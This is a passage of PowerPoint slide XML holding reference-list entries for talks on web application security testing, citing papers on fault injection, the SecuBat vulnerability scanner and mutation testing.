            <a:r>
              <a:rPr sz="1400" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>T. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lin, and C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Tsai, “Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Assessment by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Fault </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-140" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="113030">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Behavior </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Monitoring,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1350" i="1" baseline="24691" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>th </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>International </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>World </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Wide </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Budapest,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>May </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2003, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>148‐159.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="11"/>
              <a:tabLst>
                <a:tab pos="292735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Kals, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E. Krida, C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Kruegel, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>N. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Jovanovic, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“SecuBat: A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Scanner,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proc. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1350" i="1" spc="-15" baseline="24691" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>th </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>International </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>World </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Wide </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Edinburgh, Scotland, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>May </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2006, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>247‐256.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="321945" indent="-309245">
              <a:lnSpc>
                <a:spcPts val="1260"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="11"/>
              <a:tabLst>
                <a:tab pos="322580" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>McAllister, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Kirda, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Kruegel, “Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Interactions for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>In‐Depth </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="135" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="349250" indent="-635">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Applications,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proc. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1350" i="1" baseline="24691" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>th </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>International Symposium </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Recent Advances </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Intrusion Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>,  Cambridge, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Massachusetts, USA, 2008, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>191‐210.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="315595" indent="-302895">
              <a:lnSpc>
                <a:spcPts val="1260"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain" startAt="13"/>
              <a:tabLst>
                <a:tab pos="316230" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>H. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Agrawal, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>DeMillo, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Hataway, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>W. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Hsu, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>W. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Hsu, E. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Krauser,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Martin, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mathur, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="67945" indent="-635">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Spafford, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Design </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mutant Operators for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>C </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Programming </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Language”, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Technical </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Report </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SERC‐TR41‐P</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Revision </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1.04, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Research </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Center, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Purdue </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>University, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Indiana, USA.,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="175" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1989</a:t>
            </a:r>
            <a:endParaRPr sz="14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225544" y="616711"/>
            <a:ext cx="1837689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5" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>enc</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>es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55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93866" y="1377188"/>
            <a:ext cx="8027034" cy="1348105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86385" marR="760730" indent="-273685">
              <a:lnSpc>
                <a:spcPts val="1340"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="330835" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>DeMillo, </a:t>
            </a:r>
            <a:r>
